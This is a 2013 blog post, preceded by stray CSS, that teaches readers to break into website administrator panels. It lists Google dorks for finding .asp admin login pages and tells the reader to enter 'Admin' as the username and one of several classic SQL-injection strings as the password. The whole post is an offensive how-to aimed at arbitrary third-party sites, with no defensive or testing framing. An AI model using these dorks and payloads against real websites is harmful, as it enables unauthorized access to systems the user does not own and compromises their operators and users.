/* ----- LOWER SECTION ----- */ #lower { margin:auto; padding: 0px 0px 10px 0px; width: 100%; background:#333434; } #lower-wrapper { margin:auto; padding: 20px 0px 20px 0px; width: 960px; } #lowerbar-wrapper { border:1px solid #DEDEDE; background:#fff; float: left; margin: 0px 5px auto; padding-bottom: 20px; width: 32%; text-align: justify; font-size:100%; line-height: 1.6em; word-wrap: break-word; overflow: hidden; } .lowerbar {margin: 0; padding: 0;} .lowerbar .widget {margin: 0; padding: 10px 20px 0px 20px;} .lowerbar h2 { margin: 0px 0px 10px 0px; padding: 3px 0px 3px 0px; text-align: left; color:#0084ce; text-transform:uppercase; font: bold 14px Arial, Tahoma, Verdana; border-bottom:3px solid #0084ce; } .lowerbar ul { margin: 0px 0px 0px 0px; padding: 0px 0px 0px 0px; list-style-type: none; } .lowerbar li { margin: 0px 0px 2px 0px; padding: 0px 0px 1px 0px; border-bottom: 1px dotted #ccc; }

Wednesday, 27 November 2013

Posted on 08:54 by Unknown

Gaining Auth Bypass On an Admin Account.



Most sites vulnerable to this are .asp
First we need 2 find a site, start by opening google.
Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"
There is a large number of google dork for basic sql injection.
here is the best:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"

Now what to do once we get to our site.
the site should look something like this :

welcome to xxxxxxxxxx administrator panel
username :
password :

so what we do here is in the username we always type "Admin"
and for our password we type our sql injection

here is a list of sql injections

' or '1'='1
' or 'x'='x
' or 0=0 --

" or 0=0 --

or 0=0 -- 
Leave a comment

0 comments :

Post a Comment

Subscribe to: Post Comments ( Atom )

Blogger news